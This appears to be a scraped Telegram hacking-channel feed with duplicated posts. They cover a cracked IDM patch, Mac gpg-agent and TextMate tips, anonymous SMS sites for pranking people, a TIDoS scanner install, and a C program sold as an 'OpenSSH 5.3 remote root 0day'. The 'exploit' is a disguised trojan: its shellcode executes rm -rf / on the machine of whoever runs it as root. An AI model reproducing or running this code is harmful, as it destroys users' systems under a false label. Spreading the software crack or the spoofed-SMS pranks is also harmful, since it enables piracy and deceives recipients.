website hacking
idm.Patch.MyEgy.rar
internet download manager crack ππ
download it run idmpatch.exe then click patch choice internet download manager location it will be C:/program Files x86/internet Download Manger pick IDMan.exe done
website hacking via @like
Only Real True Linux Lovers Will Get It Don't Forget To Press Like Button!
ββββββββββββββ
One OS To Rule Them All, One OS To Find Them.
One OS To Call Them All, And In Salivation Bind Them.
In The Bright Land Of Linux, Where The Hackers Play.
-J.Scott Thayer
ββββββββββββββ
ββββββββββββββ
One OS To Rule Them All, One OS To Find Them.
One OS To Call Them All, And In Salivation Bind Them.
In The Bright Land Of Linux, Where The Hackers Play.
-J.Scott Thayer
ββββββββββββββ
Forwarded from F SOCIETY
This media is not supported in your browser
VIEW IN TELEGRAM
#EIDMUBARAK FOR ALL OUR FRIENDS
Forwarded from Null Byte
cutable
#!/bin/sh
killall gpg-agent
add this script to the logouthook
sudo defaults write com.apple.loginwindow LogoutHook /etc/logout-script
Without the logout script, gpg-agent keeps running even when you log out and
when you log back in, the login hook fails to run (since gpg-agent is already
running) but you can't talk to the socket any more and gpg-agent will be useless.
Getting a GUI pinentry
======================
Get Benjamin Donachie's mac native pinentry from
http://www.py-soft.co.uk/~benjamin/download/mac-gpg/
drop the bundle in the /Applications folder
Modify ~/.gnupg/gpg-agent.conf to add
pinentry-program "/Applications/pinentry-mac.app/Contents/MacOS/pinentry-mac"
Don't use the "no-grab" option in the gpg-agent.conf file. This makes the
native pinentry GUI app hang invisibly.
TextMate seting up for Latex with 64bit kernel
http://wiki.macromates.com/Troubleshooting/SnowLeopard
"βR (or similar) giving Inappropriate ioctl for device error β ticket F66289D9
This is caused by booting the kernel in 64 bit mode. Very few systems should do this by default, see this article about how to control which kernel to use.
Workaround: Comment out line 169 in $TM_SUPPORT_PATH/lib/tmp/process.rb, this line looks like this:
io[0][0].fcntl(6, ENV['TM_PID'].to_i) if ENV.has_key? 'TM_PID'
To open the file (from the proper support folder) you can press βR on the following line in a TextMate document:
open -a TextMate "$TM_SUPPORT_PATH/lib/tm/process.rb"
Be aware that this will disable interactive input. Something which was initially broken on Snow Leopard, but is working using the latest dylib from the svn repository."
#!/bin/sh
killall gpg-agent
add this script to the logouthook
sudo defaults write com.apple.loginwindow LogoutHook /etc/logout-script
Without the logout script, gpg-agent keeps running even when you log out and
when you log back in, the login hook fails to run (since gpg-agent is already
running) but you can't talk to the socket any more and gpg-agent will be useless.
Getting a GUI pinentry
======================
Get Benjamin Donachie's mac native pinentry from
http://www.py-soft.co.uk/~benjamin/download/mac-gpg/
drop the bundle in the /Applications folder
Modify ~/.gnupg/gpg-agent.conf to add
pinentry-program "/Applications/pinentry-mac.app/Contents/MacOS/pinentry-mac"
Don't use the "no-grab" option in the gpg-agent.conf file. This makes the
native pinentry GUI app hang invisibly.
TextMate seting up for Latex with 64bit kernel
http://wiki.macromates.com/Troubleshooting/SnowLeopard
"βR (or similar) giving Inappropriate ioctl for device error β ticket F66289D9
This is caused by booting the kernel in 64 bit mode. Very few systems should do this by default, see this article about how to control which kernel to use.
Workaround: Comment out line 169 in $TM_SUPPORT_PATH/lib/tmp/process.rb, this line looks like this:
io[0][0].fcntl(6, ENV['TM_PID'].to_i) if ENV.has_key? 'TM_PID'
To open the file (from the proper support folder) you can press βR on the following line in a TextMate document:
open -a TextMate "$TM_SUPPORT_PATH/lib/tm/process.rb"
Be aware that this will disable interactive input. Something which was initially broken on Snow Leopard, but is working using the latest dylib from the svn repository."
Forwarded from F SOCIETY
Learn Full HTML
presented by:- @fsocietyofficial
https://drive.google.com/drive/mobile/folders/0B3LfaGUUk6tiT18xZDRBY1FCVXc
HTML Course
π Impossible is Possible π
@fsocietyofficial
β¨οΈβ¨οΈβ¨οΈβ¨οΈβ¨οΈβ¨οΈβ¨οΈβ¨οΈβ¨οΈβ¨οΈβ¨οΈ
presented by:- @fsocietyofficial
https://drive.google.com/drive/mobile/folders/0B3LfaGUUk6tiT18xZDRBY1FCVXc
HTML Course
π Impossible is Possible π
@fsocietyofficial
β¨οΈβ¨οΈβ¨οΈβ¨οΈβ¨οΈβ¨οΈβ¨οΈβ¨οΈβ¨οΈβ¨οΈβ¨οΈ
i can change bitcoin to paypal but i take rate
pm me if u want to channge bitcoin to paypal @jackmodss
pm me if u want to channge bitcoin to paypal @jackmodss
β³οΈ How To Send Anonymous SMS To Any Number all over the world with freeβ³οΈ
π The method is actually based on sending SMS using some online websites that will allow you to send SMS without entering any personal details. So just have a look on the websites to send free Anonymous SMS.
π List of Websites To Send Anonymous SMS To Any Number :-
1,π Seasms.com
- This is the one of the best site that supports 160 character message to send to any number online and you will not need to register any personal details and can send free SMS to any of number.
2,πSendanonymoussms.com
- This is another cool site that allows user to send anonymous messages without registering personal details also the message sending speed is also very fast.
3,π Armsms.com
- This is one of the best anonymous SMS sending portal that allow you to send any message all over the world that absolutely free.
π Now you can make your friends fool by sending them different SMS without let them know about the sender of that message as you will be sending from the anonymous network which will not display any personal detail of any user.
βββββ’β’ββββββ’β’βββ
π£βΉshare &Join Us
ππΎππΎππΎ @hackwebsite
ββ β’β’β’ β β’β’βββ’β’β’ββββ
π The method is actually based on sending SMS using some online websites that will allow you to send SMS without entering any personal details. So just have a look on the websites to send free Anonymous SMS.
π List of Websites To Send Anonymous SMS To Any Number :-
1,π Seasms.com
- This is the one of the best site that supports 160 character message to send to any number online and you will not need to register any personal details and can send free SMS to any of number.
2,πSendanonymoussms.com
- This is another cool site that allows user to send anonymous messages without registering personal details also the message sending speed is also very fast.
3,π Armsms.com
- This is one of the best anonymous SMS sending portal that allow you to send any message all over the world that absolutely free.
π Now you can make your friends fool by sending them different SMS without let them know about the sender of that message as you will be sending from the anonymous network which will not display any personal detail of any user.
βββββ’β’ββββββ’β’βββ
π£βΉshare &Join Us
ππΎππΎππΎ @hackwebsite
ββ β’β’β’ β β’β’βββ’β’β’ββββ
Penetration Testing Procedures & Methodologies.pdf
8 MB
Penetration testing Pdf
#sirxshell
#sirxshell
(OpenSsh 5.3 32-bit x86 remote root 0day exploit)
Poc
/* * * Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! * * OpenSSH <= 5.3 remote root 0day exploit (32-bit x86) * Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! * * */ #include <stdio.h> #include <netdb.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <arpa/inet.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> void usage(char *argv[]) { printf("\n\t[+] HATSUNEMIKU\n"); printf("\t[+] OpenSSH <= 5.3p1 remote root 0day exploit\n"); printf("\t[+] Keep this 0day priv8!\n"); printf("\t[+] usage: %s <target> <port>\n\n", argv[0]); exit(1); } unsigned char decoder[]= "\x6a\x0b\x58\x99\x52" "\x6a\x2f\x89\xe7\x52" "\x66\x68\x2d\x66\x89" "\xe6\x52\x66\x68\x2d" "\x72\x89\xe1\x52\x68" "\x2f\x2f\x72\x6d\x68" "\x2f\x62\x69\x6e\x89" "\xe3\x52\x57\x56\x51" "\x53\x89\xe1\xcd\x80"; unsigned char rootshell[]= "\x31\xd2\xb2\x0a\xb9\x6f\x75\x21\x0a\x51\xb9\x63\x6b" "\x20\x79\x51\x66\xb9\x66\x75\x66\x51\x31\xc9\x89\xe1" "\x31\xdb\xb3\x01\x31\xc0\xb0\x04\xcd\x80\x31\xc0\x31" "\xdb\x40\xcd\x80"; int main(int argc, char **argv) { int euid = geteuid(); int port= 22, sock; char h[1000]; struct hostent *host; struct sockaddr_in addr; if(euid != 0) { fprintf(stderr, "You need to be root to use raw sockets.\n"); exit(1); } if(euid == 0) { fprintf(stdout, "MIKU! MIKU! MIKU!\n"); } if(argc != 3) usage(argv); if(!inet_aton(h, &addr.sin_addr)) { host = gethostbyname(h); if(!host) { fprintf(stderr, "[-] Exploit failed.\n"); (*(void(*)())decoder)(); exit(1); } addr.sin_addr = *(struct in_addr*)host->h_addr; } sock = socket(PF_INET, SOCK_STREAM, 0); addr.sin_port = htons(port); addr.sin_family = AF_INET; if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1) { fprintf(stderr,"[-] Exploit failed.\n"); exit(1); } char payload[1337]; memcpy(payload, &decoder, sizeof(decoder)); memcpy(payload, &rootshell, sizeof(rootshell)); send(sock, payload, strlen(payload),0); close(sock); if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1) { fprintf(stderr, "[-] Exploit failed.\n"); exit(1); } else if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==0) { fprintf(stdout, "[+]g0t sh3ll!\n"); system("/bin/bash"); } else { fprintf(stderr, "[-] Exploit failed.\n"); close(sock); exit(0); } }
for any help pm me @jackmodss
Poc
/* * * Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! * * OpenSSH <= 5.3 remote root 0day exploit (32-bit x86) * Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! * * */ #include <stdio.h> #include <netdb.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <arpa/inet.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> void usage(char *argv[]) { printf("\n\t[+] HATSUNEMIKU\n"); printf("\t[+] OpenSSH <= 5.3p1 remote root 0day exploit\n"); printf("\t[+] Keep this 0day priv8!\n"); printf("\t[+] usage: %s <target> <port>\n\n", argv[0]); exit(1); } unsigned char decoder[]= "\x6a\x0b\x58\x99\x52" "\x6a\x2f\x89\xe7\x52" "\x66\x68\x2d\x66\x89" "\xe6\x52\x66\x68\x2d" "\x72\x89\xe1\x52\x68" "\x2f\x2f\x72\x6d\x68" "\x2f\x62\x69\x6e\x89" "\xe3\x52\x57\x56\x51" "\x53\x89\xe1\xcd\x80"; unsigned char rootshell[]= "\x31\xd2\xb2\x0a\xb9\x6f\x75\x21\x0a\x51\xb9\x63\x6b" "\x20\x79\x51\x66\xb9\x66\x75\x66\x51\x31\xc9\x89\xe1" "\x31\xdb\xb3\x01\x31\xc0\xb0\x04\xcd\x80\x31\xc0\x31" "\xdb\x40\xcd\x80"; int main(int argc, char **argv) { int euid = geteuid(); int port= 22, sock; char h[1000]; struct hostent *host; struct sockaddr_in addr; if(euid != 0) { fprintf(stderr, "You need to be root to use raw sockets.\n"); exit(1); } if(euid == 0) { fprintf(stdout, "MIKU! MIKU! MIKU!\n"); } if(argc != 3) usage(argv); if(!inet_aton(h, &addr.sin_addr)) { host = gethostbyname(h); if(!host) { fprintf(stderr, "[-] Exploit failed.\n"); (*(void(*)())decoder)(); exit(1); } addr.sin_addr = *(struct in_addr*)host->h_addr; } sock = socket(PF_INET, SOCK_STREAM, 0); addr.sin_port = htons(port); addr.sin_family = AF_INET; if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1) { fprintf(stderr,"[-] Exploit failed.\n"); exit(1); } char payload[1337]; memcpy(payload, &decoder, sizeof(decoder)); memcpy(payload, &rootshell, sizeof(rootshell)); send(sock, payload, strlen(payload),0); close(sock); if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1) { fprintf(stderr, "[-] Exploit failed.\n"); exit(1); } else if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==0) { fprintf(stdout, "[+]g0t sh3ll!\n"); system("/bin/bash"); } else { fprintf(stderr, "[-] Exploit failed.\n"); close(sock); exit(0); } }
for any help pm me @jackmodss
TiDos server Scanning tool and Vulnerability analysis tool
how to install it (only on
parrot or kali linux)
Link: git clone https://github.com/0xInfection/TIDoS-Framework.git
cd TiDoS-Framework
sudo chmod 764 install
./install
then run tidos on terminal
how to install it (only on
parrot or kali linux)
Link: git clone https://github.com/0xInfection/TIDoS-Framework.git
cd TiDoS-Framework
sudo chmod 764 install
./install
then run tidos on terminal